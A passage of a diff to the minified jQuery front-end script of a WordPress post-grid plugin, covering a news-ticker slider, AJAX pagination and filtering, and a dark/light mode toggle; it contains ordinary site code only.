again"+t.statusText+t.responseText)}}),!1}))})),t(window).on("scroll",(function(){t(window).scrollTop()+window.innerHeight>=t("footer")?.offset()?.top?t(".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer").addClass("remove-sticky"):t(".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer").removeClass("remove-sticky")})),t(".ultp-news-ticker").each((function(){t(this).UltpSlider({type:t(this).data("type"),direction:t(this).data("direction"),speed:t(this).data("speed"),pauseOnHover:1==t(this).data("hover"),controls:{prev:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-prev"),next:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-next"),toggle:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-pause")}})})),t(".ultp-toc-backtotop").on("click",(function(e){e.preventDefault(),t("html, body").animate({scrollTop:0},"slow")})),t(window).on("scroll",(function(){i()})),i(),t(".ultp-collapsible-open").on("click",(function(e){t(this).closest(".ultp-collapsible-toggle").removeClass("ultp-toggle-collapsed"),t(this).parents(".ultp-block-toc").find(".ultp-block-toc-body").show()})),t(".ultp-collapsible-hide").on("click",(function(e){t(this).closest(".ultp-collapsible-toggle").addClass("ultp-toggle-collapsed"),t(this).parents(".ultp-block-toc").find(".ultp-block-toc-body").hide()})),t(".ultp-toc-lists li a").on("click",(function(){t([document.documentElement,document.body]).animate({scrollTop:t(t(this).attr("href")).offset().top-50},500)})),t(document).ready((function(){if(t(".ultp-flex-menu").length>0){const e=t("ul.ultp-flex-menu").data("name");t("ul.ultp-flex-menu").flexMenu({linkText:e,linkTextAll:e,linkTitle:e})}})),t(document).on("click",(function(e){0===t(e.target).closest(".flexMenu-viewMore").length&&(t(".flexMenu-viewMore").removeClass("active"),t(".flexMenu-viewMore").children("ul.flexMenu-popup").css("display","none"))})),t(document).on("click",".ultp-filter-navigation .flexMenu-popup .filter-item",(function(e){t(".flexMenu-viewMore").removeClass("active"),t(".flexMenu-viewMore").children("ul.flexMenu-popup").css("display","none")})),t(".ultp-post-grid-parent").each((function(){const e=t(this).find(".ultp-post-grid-block"),i=t(this).find(".ultp-pagination-block"),s=e.find(".pagination-block-html > div");i.length<1||s.length<1||(i.attr("class").split(" ").forEach((t=>{s.addClass(t)})),i.html(s))})),t(document).off("click",".ultp-pagination-ajax-action li, .ultp-loadmore-action, .ultp-prev-action, .ultp-next-action",(function(t){})),t(document).on("click",".ultp-prev-action, .ultp-next-action",(function(e){e.preventDefault();let i=t(this).closest(".ultp-next-prev-wrap"),s=i.closest(".ultp-block-wrapper").find(".ultp-block-items-wrap"),o=parseInt(i.data("pagenum")),n=parseInt(i.data("pages")),a=i.closest(".ultp-block-wrapper");const r=i.parents(".ultp-post-grid-parent");if(s.length<1){const e=i.data("for");e&&(s=t("."+e+" .ultp-block-items-wrap"))}if(i.is(".ultp-disable-editor-click"))return;if(t(this).hasClass("ultp-prev-action")){if(t(this).hasClass("ultp-disable"))return;o--,i.data("pagenum",o),i.find(".ultp-prev-action, .ultp-next-action").removeClass("ultp-disable"),1==o&&t(this).addClass("ultp-disable")}if(t(this).hasClass("ultp-next-action")){if(t(this).hasClass("ultp-disable"))return;o++,i.data("pagenum",o),i.find(".ultp-prev-action, .ultp-next-action").removeClass("ultp-disable"),o==n&&t(this).addClass("ultp-disable")}let d=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");t(this).closest(".ultp-builder-content").length>0&&(d=t(this).closest(".ultp-builder-content").data("postid"));let c="",p=t(this).parents(".widget_block:first");if(p.length>0){let t=p.attr("id").split("-");c=t[t.length-1]}const h=sessionStorage.getItem("ultp_uniqueIds"),f=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts")),m=i.data("filter-value")||"",g={};Array.isArray(m)&&m.length>0&&(g.filterShow=!0,g.checkFilter=!0,g.isAdv=!0,g.author=i.data("filter-author")||"",g.order=i.data("filter-order")||"",g.orderby=i.data("filter-orderby")||"",g.adv_sort=i.data("filter-adv-sort")||""),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_next_prev",paged:o,blockId:i.data("blockid"),postId:d,exclude:i.data("expost"),blockName:i.data("blockname"),builder:i.data("builder"),filterValue:m,filterType:i.data("filter-type")||"",widgetBlockId:c,ultpUniqueIds:h||[],ultpCurrentUniquePosts:f||[],...g,wpnonce:ultp_data_frontend.security},beforeSend:function(){a.length<1&&r.length>0?r.find(".ultp-block-wrapper").addClass("ultp-loading-active"):a.addClass("ultp-loading-active")},success:function(e){e&&(s.html(e),l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),t(window).scrollTop()>s.offset().top&&t([document.documentElement,document.body]).animate({scrollTop:s.offset().top-80},100))},complete:function(){a.length<1&&r.length>0?r.find(".ultp-block-wrapper").removeClass("ultp-loading-active"):a.removeClass("ultp-loading-active"),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),i.closest(".ultp-block-wrapper").removeClass("ultp-loading-active")}})})),t(document).on("click",".ultp-loadmore-action",(function(e){if(t(this).is(".ultp-disable-editor-click"))return;e.preventDefault();let i=t(this),s=i.closest(".ultp-block-wrapper"),o=!1;if(s.length<1){const e=i.data("for");e&&(s=t("."+e+" .ultp-block-wrapper"),o=s.length>0)}let n=parseInt(i.data("pagenum")),a=parseInt(i.data("pages"));if(i.hasClass("ultp-disable"))return;n++,i.data("pagenum",n),n==a?t(this).addClass("ultp-disable"):t(this).removeClass("ultp-disable");let r=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");i.closest(".ultp-builder-content").length>0&&(r=i.closest(".ultp-builder-content").data("postid"));let d="",c=t(this).parents(".widget_block:first");if(c.length>0){let t=c.attr("id").split("-");d=t[t.length-1]}const p=sessionStorage.getItem("ultp_uniqueIds"),u=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts")),h=i.data("filter-value")||"",f={};Array.isArray(h)&&h.length>0&&(f.filterShow=!0,f.checkFilter=!0,f.isAdv=!0,f.author=i.data("filter-author")||"",f.order=i.data("filter-order")||"",f.orderby=i.data("filter-orderby")||"",f.adv_sort=i.data("filter-adv-sort")||""),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_next_prev",paged:n,blockId:i.data("blockid"),postId:r,blockName:i.data("blockname"),builder:i.data("builder"),exclude:i.data("expost"),filterValue:h,filterType:i.data("filter-type")||"",widgetBlockId:d,ultpUniqueIds:p||[],ultpCurrentUniquePosts:u||[],...f,wpnonce:ultp_data_frontend.security},beforeSend:function(){s.addClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","flex")},success:function(e){if(e){s.find(".ultp-block-row").css("max-height","unset"),s.find(".ultp-current-unique-posts").remove();const o=s.find(".ultp-loadmore-insert-before");if(o.length)i.data("blockname").includes("post-module")&&t('<div style="clear:left;width:100%;padding-block:15px;"></div>').insertBefore(o),t(e).insertBefore(o);else{const o=s.find(".ultp-block-items-wrap");i.data("blockname").includes("post-module")&&o.append(t('<div style="clear:left;width:100%;padding-block:15px;"></div>')),o.append(e)}l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids")))}},complete:function(){s.removeClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","none")},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),s.removeClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","none")}})})),t(document).on("click",".ultp-filter-wrap li a",(function(e){if(e.preventDefault(),t(this).closest("li").hasClass("filter-item")){let e=t(this),i=e.closest(".ultp-filter-wrap"),s=e.closest(".ultp-block-wrapper");const o=e.parents(".ultp-post-grid-parent");if(i.find("a").removeClass("filter-active"),e.addClass("filter-active"),i.is(".ultp-disable-editor-click"))return;let n=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");e.closest(".ultp-builder-content").length>0&&(n=e.closest(".ultp-builder-content").data("postid"));let a="",r=t(this).parents(".widget_block:first");if(r.length>0){let t=r.attr("id").split("-");a=t[t.length-1]}const d=sessionStorage.getItem("ultp_uniqueIds"),c=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts"));i.data("blockid")&&t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_filter",taxtype:i.data("taxtype"),taxonomy:e.data("taxonomy"),blockId:i.data("blockid"),postId:n,blockName:i.data("blockname"),widgetBlockId:a,ultpUniqueIds:d||[],ultpCurrentUniquePosts:c||[],wpnonce:ultp_data_frontend.security},beforeSend:function(){s.addClass("ultp-loading-active")},success:function(e){s.find(".ultp-block-items-wrap").html(e?.data?.filteredData?.blocks),"loadMore"==e?.data?.filteredData?.paginationType&&e?.data?.filteredData?.paginationShow?s.find(".ultp-loadmore").replaceWith(e?.data?.filteredData?.pagination):"navigation"==e?.data?.filteredData?.paginationType?s.find(".ultp-next-prev-wrap").replaceWith(e?.data?.filteredData?.pagination):"pagination"==e?.data?.filteredData?.paginationType&&s.find(".ultp-pagination-wrap").replaceWith(e?.data?.filteredData?.pagination),e?.data?.filteredData?.pagination&&o.length>0&&o.data("pagi")?.map((i=>{let s=[];if("loadMore"===e?.data?.filteredData?.paginationType?(s=t(".ultp-loadmore."+i),s.length):s=t("."+i+"[data-for]"),s.length>0){const i=t(e.data.filteredData.pagination);s.attr("class").split(" ").forEach((t=>i.addClass(t))),s.replaceWith(i)}}))},complete:function(){s.removeClass("ultp-loading-active"),l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),s.removeClass("ultp-loading-active")}})}})),t(".ultp-current-unique-posts").length>0&&t(".ultp-current-unique-posts").each((function(){l("ultp_uniqueIds",JSON.stringify(t(this).data("ultp-unique-ids")))})),t(document).on("click",".ultp-pagination-ajax-action li",(function(e){e.preventDefault();let i=t(this),n=i.closest(".ultp-pagination-ajax-action"),a=i.closest(".ultp-block-wrapper");const r=n.attr("data-blockid");if(a.length<1){const e=n.data("for");e&&(a=t("."+e+" .ultp-block-wrapper"))}if(n.is(".ultp-disable-editor-click"))return;let d=1,c=n.attr("data-pages");i.attr("data-current")?(d=Number(i.attr("data-current")),n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c)):i.hasClass("ultp-prev-page-numbers")?(d=Number(n.attr("data-paged"))-1,n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c)):i.hasClass("ultp-next-page-numbers")&&(d=Number(n.attr("data-paged"))+1,n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c));let p=0!=n.parents(".ultp-shortcode").length&&"no"==n.data("selfpostid")?n.parents(".ultp-shortcode").data("postid"):n.data("postid");i.closest(".ultp-builder-content").length>0&&(p=i.closest(".ultp-builder-content").data("postid"));let h="",f=t(this).parents(".widget_block:first");if(f.length>0){let t=f.attr("id").split("-");h=t[t.length-1]}const m=sessionStorage.getItem("ultp_uniqueIds"),g=JSON.stringify(a.find(".ultp-current-unique-posts").data("current-unique-posts")),v=n.data("filter-value")||"",b={};Array.isArray(v)&&v.length>0&&(b.filterShow=!0,b.checkFilter=!0,b.isAdv=!0,b.author=n.data("filter-author")||"",b.order=n.data("filter-order")||"",b.orderby=n.data("filter-orderby")||"",b.adv_sort=n.data("filter-adv-sort")||""),d&&(r&&function(t,e,i){const s=new URLSearchParams(window.location.search);s.set(`${t}_page`,e);const o=window.location.pathname+"?"+s.toString();window.history.replaceState({page:{[t]:i}},document.title,o)}(r,d,function(t){const e=new URLSearchParams(window.location.search).get(t+"_page");return e?+e:1}(r)),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{exclude:n.data("expost"),action:"ultp_pagination",paged:d,blockId:n.data("blockid"),postId:p,blockName:n.data("blockname"),builder:n.data("builder"),widgetBlockId:h,ultpUniqueIds:m||[],ultpCurrentUniquePosts:g||[],filterType:n.data("filter-type")||"",filterValue:v,...b,wpnonce:ultp_data_frontend.security},beforeSend:function(){a.addClass("ultp-loading-active")},success:function(e){a.find(".ultp-block-items-wrap").html(e),l("ultp_uniqueIds",JSON.stringify(a.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),t(window).scrollTop()>a.offset().top&&t([document.documentElement,document.body]).animate({scrollTop:a.offset().top-80},100)},complete:function(){a.removeClass("ultp-loading-active"),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),a.removeClass("ultp-loading-active")}}))})),t(window).on("elementor/frontend/init",(()=>{setTimeout((()=>{t(".elementor-editor-active").length>0&&n()}),2e3)})),t(".bricks-builder-iframe").length>0&&t(window.parent.document).find(".bricks-panel-controls").length>0&&setTimeout((()=>{n()}),2500),n(),t('span[role="button"].ultp-loadmore-action').on("keydown",(function(t){const e=void 0!==t.key?t.key:t.keyCode;("Enter"===e||13===e||["Spacebar"," "].indexOf(e)>=0||32===e)&&(t.preventDefault(),this.click())}));let a=!0;function r(t){switch(t){case"categories":return"category";case"tag":case"tags":return"post_tag";case"authors":return"author";case"order_by":return"orderby";default:return t}}t(window).on("scroll",(function(){let e=t(this).scrollTop();t(".wp-block-ultimate-post-post-image").each((function(){let i=t(this).find(".ultp-builder-video video , .ultp-builder-video iframe");if(t(this).find(".ultp-video-block").hasClass("ultp-sticky-video")){let s=t(this).find(".ultp-image-wrapper"),o=s.offset(),l=i.height(),n=i.offset(),r=e+(t("#wpadminbar").height()||0),d=n.top+l;r>n.top&&r>d&&a&&(t(this).find(".ultp-image-wrapper").css("height",s.height()),t(this).find(".ultp-sticky-video").addClass("ultp-sticky-active")),r<s.height()+o.top&&(t(this).find(".ultp-sticky-video").removeClass("ultp-sticky-active"),t(this).find(".ultp-image-wrapper").css("height","auto")),t(".ultp-sticky-close").on("click",(function(){t(this).find(".ultp-image-wrapper").css("height","auto"),t(".ultp-sticky-video").removeClass("ultp-sticky-active"),a=!1}))}}))})),t(".ultp-filter-block").each((function(){const e=t(this),i=t(this).parents(".ultp-post-grid-parent"),s=i.find(".ultp-block-wrapper"),o=JSON.parse(i.attr("data-grids")),n=i.attr("data-postid"),a=t(this).find(".ultp-filter-clear-template"),d=t(this).find(".ultp-filter-clear-button"),c="ultp-block-"+d.data("blockid")+"-first";function p(){o.forEach((e=>{!function(e,i,s,o,n){const a=[],d={},c=e.data("pagi");e.find('.ultp-filter-button[data-is-active="true"]').each((function(){const e=t(this).attr("data-type"),i=t(this).attr("data-selected"),s=t(this).attr("data-tax");"author"!==r(e)?"order"!==r(e)?"orderby"!==r(e)?"adv_sort"!==r(e)?"custom_tax"!==r(e)?a.push({value:r(e)+"###"+i}):s&&a.push({value:s+"###"+i}):d.adv_sort=i:d.orderby=i:d.order=i:"_all"!==i&&(d.author=[{value:i}])})),e.find(".ultp-filter-select").each((function(){const e=t(this).attr("data-type"),i=t(this).attr("data-selected"),s=t(this).find('.ultp-filter-select__dropdown-inner[data-id="'+i+'"]').data("tax");"author"!==r(e)?"order"!==r(e)?"orderby"!==r(e)?"adv_sort"!==r(e)?"custom_tax"!==r(e)?a.push({value:r(e)+"###"+i}):s&&a.push({value:s+"###"+i}):d.adv_sort=i:d.orderby=i:d.order=i:"_all"!==i&&(d.author=[{value:i}])})),d.taxonomy=a;const p=e.find(".ultp-filter-search input");p.length>0&&(d.search=p.val());const u=sessionStorage.getItem("ultp_uniqueIds"),h=JSON.stringify(e.find(".ultp-current-unique-posts").data("current-unique-posts"));let f="",m=e.parents(".widget_block:first");if(m.length>0){let t=m.attr("id").split("-");f=t[t.length-1]}t(n).each((function(){const n=t(this);t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_adv_filter",...d,blockId:i,blockName:s,postId:o,ultpUniqueIds:u||[],ultpCurrentUniquePosts:h||[],widgetBlockId:f,wpnonce:ultp_data_frontend.security},beforeSend:function(){n.addClass("ultp-loading-active")},success:function(e){n.closest(".wp-block-ultimate-post-post-grid-parent")?.find(".ultp-not-found-message")?.remove(),""===e?.data?.filteredData?.blocks&&e?.data?.filteredData?.notFound&&n.closest(".wp-block-ultimate-post-post-grid-parent").append('<div class="ultp-not-found-message" role="alert">'+e?.data?.filteredData?.notFound+"</div>"),n.find(".ultp-block-items-wrap").html(e?.data?.filteredData?.blocks),"loadMore"==e?.data?.filteredData?.paginationType&&e?.data?.filteredData?.paginationShow?n.find(".ultp-loadmore").replaceWith(e?.data?.filteredData?.pagination):"navigation"==e?.data?.filteredData?.paginationType?n.find(".ultp-next-prev-wrap").replaceWith(e?.data?.filteredData?.pagination):"pagination"==e?.data?.filteredData?.paginationType&&n.find(".ultp-pagination-wrap").replaceWith(e?.data?.filteredData?.pagination),e?.data?.filteredData?.pagination&&c?.map((i=>{let s=[];if("loadMore"===e?.data?.filteredData?.paginationType?(s=t(".ultp-loadmore."+i),s.length):s=t("."+i+"[data-for]"),s.length>0){const i=t(e.data.filteredData.pagination);s.attr("class").split(" ").forEach((t=>i.addClass(t))),s.replaceWith(i)}}))},complete:function(){n.removeClass("ultp-loading-active"),l("ultp_uniqueIds",JSON.stringify(e.find(".ultp-current-unique-posts").data("ultp-unique-ids")))},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),n.removeClass("ultp-loading-active")}})}))}(i,e.blockId,e.name,n,s)}))}let u;function h(t){clearTimeout(u),u=t?setTimeout(p,500):p()}e.find(".ultp-filter-select").each((function(){const i=t(this).find(".ultp-filter-select-options"),s=t(this).find(".ultp-filter-select-field-selected"),o=t(this).find(".ultp-filter-select-field-icon"),l=t(this),n=t(this).attr("data-type"),r=t(this).find(".ultp-filter-select-search");function u(e){e?(t(".ultp-filter-select .ultp-filter-select-options").css("display","none"),t(".ultp-filter-select .ultp-filter-select-field-icon").removeClass("ultp-dropdown-icon-rotate"),t(".ultp-filter-select").attr("aria-expanded",!1),i.css("display","block"),o.addClass("ultp-dropdown-icon-rotate")):(i.css("display","none"),o.removeClass("ultp-dropdown-icon-rotate")),l.attr("aria-expanded",e)}const h=i.find("li").first();t(this).on("click",(function(t){t.stopPropagation(),u("none"===i.css("display"))})),t(i).find("li").each((function(){const i=t(this).attr("data-id"),o=t(this).attr("data-blockId"),r=t(this).text();t(this).on("click",(function(){if(s.text(r),l.attr("data-selected",i),"_all"===i)e.find(`.ultp-filter-clear[data-type="${n}"]`).remove();else if(d.length>0){let t=!1,u=e.find(`.ultp-filter-clear[data-type="${n}"]`);u.length<1&&(t=!0,u=a.clone()),u.removeClass("ultp-filter-clear-template"),u.addClass("ultp-filter-clear-selected-filter"),u.find(".ultp-selected-filter-text").text(function(t,e){return`${t.replace("_"," ").replace(/\b\w/g,(t=>t.toUpperCase()))}: ${e}`}(n,r)),d.hasClass(c)&&(d.removeClass(c),u.addClass(c)),u.find(".ultp-selected-filter-icon").on("click",(function(){s.text(h.text()),l.attr("data-selected",h.attr("data-id")),u.hasClass(c)&&(u.next().hasClass("ultp-filter-clear-selected-filter")?u.next().addClass(c):d.addClass(c)),u.remove(),p()})),u.attr("data-id",i),u.attr("data-type",n),u.attr("data-for",o),u.css({display:"block"}),t&&u.insertBefore(d)}p(),u(!0)}))})),r.on("click",(function(t){t.preventDefault(),t.stopPropagation()})),r.on("input",(function(e){const s=String(e.target.value).toLowerCase();s.length>0?i.find("li").each((function(){const e=t(this).text();t(this).css("display",e.toLowerCase().includes(s)?"list-item":"none")})):i.find("li").each((function(){t(this).css("display","list-item")}))})),t(document).on("click",(function(t){l.is(t.target)||l.has(t.target).length||u(!1)}))})),e.find(".ultp-filter-button").each((function(){const i=this,s=t(this).data("type");t(this).on("click",(function(){const o="true"===t(i).attr("data-is-active");if("_all"===t(this).data("selected")){const t=e.find('.ultp-filter-button[data-selected]:not([data-selected="_all"])');t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}else if(["adv_sort","order","order_by"].includes(s)&&!o){const t=e.find(`.ultp-filter-button[data-type="${s}"]`);t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}else{const t=e.find('.ultp-filter-button[data-selected="_all"]');t.length>0&&(t.attr("data-is-active","false"),t.removeClass("ultp-filter-button-active"))}o?(t(i).attr("data-is-active","false"),t(i).removeClass("ultp-filter-button-active")):(t(i).attr("data-is-active","true"),t(i).addClass("ultp-filter-button-active")),p()}))})),d.on("click",(function(){!function(){e.find(".ultp-filter-select").each((function(){const e=t(this).find(".ultp-filter-select-options li").first();t(this).attr("data-selected",e.attr("data-id")),t(this).find(".ultp-filter-select-field-selected").text(e.text())}));const i=e.find(".ultp-filter-clear-selected-filter");i.hasClass(c)&&d.addClass(c),i.remove(),e.find(".ultp-filter-search input").val(""),e.find('.ultp-filter-button[data-is-active="true"]').each((function(){t(this).removeClass("ultp-filter-button-active"),t(this).attr("data-is-active","false")}))}(),p()})),i.find(".ultp-filter-search input").off("input").on("input",(function(){h(!0)})),i.find(".ultp-filter-search input").on("keydown",(function(t){"Enter"===t.key&&h(!1)})),i.find(".ultp-filter-search-icon").on("click",(function(){h(!1)}))}));const d=ultp_data_frontend?.dark_logo,c=t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("src"),p=t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("srcset")||"";function u(){t(".ultp-video-modal .ultp-video-modal__content .ultp-video-wrapper > iframe").each((function(){const e=t(this),i=e.attr("src");i&&i.includes("dailymotion.com/player")&&"&"==i[i.length-1]&&e.attr("src",i.slice(0,i.length-1)+"?autoplay=0")}))}t(document).on("click",".ultp-dark-light-block-wrapper-content.ultp-frontend .ultp-dl-con",(function(e){e.preventDefault();const i=t(this).closest(".ultp-dark-light-block-wrapper-content"),s=t(this).hasClass("ultp-light-con"),o=t(this).closest(".ultp-dl-after-before-con"),l=i.find(`.ultp-${s?"dark":"light"}-con`).closest(".ultp-dl-after-before-con"),n=o.data("iconlay"),a=o.data("iconsize"),r=o.data("iconrev");let u=0;if(["layout5","layout6","layout7"].includes(n)){u="layout7"==n?500:400;const e="layout7"==n?t(this).find(".ultp-dl-text").width():a/2;s?(t(this).find(".ultp-dl-svg-con").css({transform:`translateX(calc(${100*(r?-1:1)}% ${r?"-":"+"} ${e}px))`,transition:`transform ${u/1e3}s ease`}),"layout6"==n?t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${100*(r?1:-1)}% ${r?"+":"-"} ${e}px))`,transition:`transform ${u/1e3}s ease`}):"layout7"==n&&t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${(r?1:-1)*a}px))`,transition:`transform ${u/1e3}s ease`})):(t(this).find(".ultp-dl-svg-con").css({transform:`translateX(calc(${100*(r?1:-1)}% ${r?"+":"-"} ${e}px))`,transition:`transform ${u/1e3}s ease`}),"layout6"==n?t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${100*(r?-1:1)}% ${r?"-":"+"} ${e}px))`,transition:`transform ${u/1e3}s ease`}):"layout7"==n&&t(this).find(".ultp-dl-text").css({transform:`translateX(calc(${(r?-1:1)*a}px))`,transition:`transform ${u/1e3}s ease`}))}!function(t,e,i){const s=new Date;s.setTime(s.getTime()+24*i*60*60*1e3);let o="expires="+s.toUTCString();document.cookie=t+"="+e+";"+o+";"}("ultplocalDLMode",s?"ultpdark":"ultplight",60),setTimeout((()=>{o.addClass("inactive"),l.removeClass("inactive"),s?(t(".wp-block-ultimate-post-image .ultp-light-image-block").addClass("inactive"),t(".wp-block-ultimate-post-image .ultp-dark-image-block").removeClass("inactive")):s||(t(".wp-block-ultimate-post-image .ultp-dark-image-block").addClass("inactive"),t(".wp-block-ultimate-post-image .ultp-light-image-block").removeClass("inactive")),t(".ultp-dark-logo.wp-block-site-logo").find("img").attr("src",s?d:c).attr("srcset",s?d:p),t(".ultp-dark-logo.wp-block-site-logo img").css({content:"initial"}),t(`.ultp-dark-light-block-wrapper-content .ultp-${s?"dark":"light"}-con`).each((function(){t(this).closest(".ultp-dl-after-before-con").removeClass("inactive")})),t(`.ultp-dark-light-block-wrapper-content .ultp-${s?"light":"dark"}-con`).each((function(){t(this).closest(".ultp-dl-after-before-con").addClass("inactive")})),t(this).find(".ultp-dl-svg-con").removeAttr("style"),t(this).find(".ultp-dl-text").removeAttr("style"),function(){if(t("#ultp-preset-colors-style-inline-css")&&t("#ultp-preset-colors-style-inline-css")[0]){const e=t("#ultp-preset-colors-style-inline-css")[0].sheet,i=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_1_color"),s=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_2_color"),o=e.cssRules[0].style.getPropertyValue("--postx_preset_Base_3_color"),l=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_1_color"),n=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_2_color"),a=e.cssRules[0].style.getPropertyValue("--postx_preset_Contrast_3_color");e.cssRules[0].style.setProperty("--postx_preset_Base_1_color",l),e.cssRules[0].style.setProperty("--postx_preset_Base_2_color",n),e.cssRules[0].style.setProperty("--postx_preset_Base_3_color",a),e.cssRules[0].style.setProperty("--postx_preset_Contrast_1_color",i),e.cssRules[0].style.setProperty("--postx_preset_Contrast_2_color",s),e.cssRules[0].style.setProperty("--postx_preset_Contrast_3_color",o)}}()}),u)})),e&&u()}(jQuery);
\ No newline at end of file
+!function(t){"use strict";t.fn.UltpSlider=function(e){let i=t.extend({},t.fn.UltpSlider.defaults,e),s=t(this),o=!0,l=0;if(s.wrap("<div class='acmeticker-wrap'></div>"),s.parent().css({position:"relative"}),s.children().first().addClass("active"),"horizontal"==i.type||"vertical"==i.type||"typewriter"==i.type){let e="";"typewriter"==i.type&&(e=setInterval((function(){a()}),i.speed));let l="";"horizontal"!=i.type&&"vertical"!=i.type||(l=setInterval((function(){a()}),i.speed)),t(i.controls.prev).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(clearInterval(l),n("prev"),o&&(l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(clearInterval(e),n("prev"),o&&(e=setInterval((function(){a()}),i.speed)))})),t(i.controls.next).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(clearInterval(l),n("next"),o&&(l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(clearInterval(e),n("next"),o&&(e=setInterval((function(){a()}),i.speed)))})),t(i.controls.toggle).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(o?(o=!1,clearInterval(l)):(o=!0,clearInterval(l),l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(o?(o=!1,clearInterval(e)):(o=!0,clearInterval(e),e=setInterval((function(){a()}),i.speed)))})),i.pauseOnHover&&(s.on("mouseenter",(function(){"typewriter"===i.type&&clearInterval(e),"horizontal"!==i.type&&"vertical"!==i.type||clearInterval(l)})),s.on("mouseleave",(function(){"typewriter"===i.type&&o&&(e=setInterval((function(){a()}),i.speed)),"horizontal"!==i.type&&"vertical"!==i.type||!o||(l=setInterval((function(){a()}),i.speed))})))}if("marquee"==i.type){let e,n=i.speed,a=0,r=i.direction,d=s.outerWidth(),c=t(".ultp-newsTicker-wrap").outerWidth(),p=t(document).find("body").hasClass("rtl");"right"==r&&(e=c),"left"==r&&(e=s.outerWidth());let u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-c),c<a&&"left"==r&&p&&(a=-e),s.css(r,-a),a++}),n);t(i.controls.prev).on("click",(function(){o?(-s.outerWidth()>a&&"right"==r&&!p&&(a=e),a<-t(".ultp-newsTicker-wrap").outerWidth()&&"left"==r&&!p&&(a=e),-e>a&&"right"==r&&p&&(a=s.outerWidth()),-e>a&&"left"==r&&p&&(a=t(".ultp-newsTicker-wrap").outerWidth()),a-=250):(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),-c>a&&"left"==r&&!p&&(a=e-100),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-e),c<a&&"left"==r&&p&&(a=-e),s.css(r,-a),a++}),n))})),t(i.controls.prev).on("mousedown touchstart",(function(e){l=setInterval((function(){p||"right"!=r?p&&"left"==r?(a<-d&&(a=t(".ultp-newsTicker-wrap").outerWidth()-10),a-=30):p||"left"!=r?(a<-t(".ultp-newsTicker-wrap").outerWidth()&&p&&"right"==r&&(a=d),a-=30):(a<-t(".ultp-newsTicker-wrap").outerWidth()&&(a=d),a-=30):a>-d?a-=30:a=t(".ultp-newsTicker-wrap").outerWidth()-10}),100)})).bind("mouseup mouseleave touchend",(function(){clearInterval(l)})),t(i.controls.next).on("click",(function(){o?a+=250:(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),e<a&&"right"==r&&!p&&(a=-d),c<a&&"left"==r&&p&&(a=-e),d<a&&"right"==r&&p&&(a=-e),s.css(r,-a),a++}),n))})),t(i.controls.next).on("mousedown touchstart",(function(t){l=setInterval((function(){a+=80}),80)})).bind("mouseup mouseleave 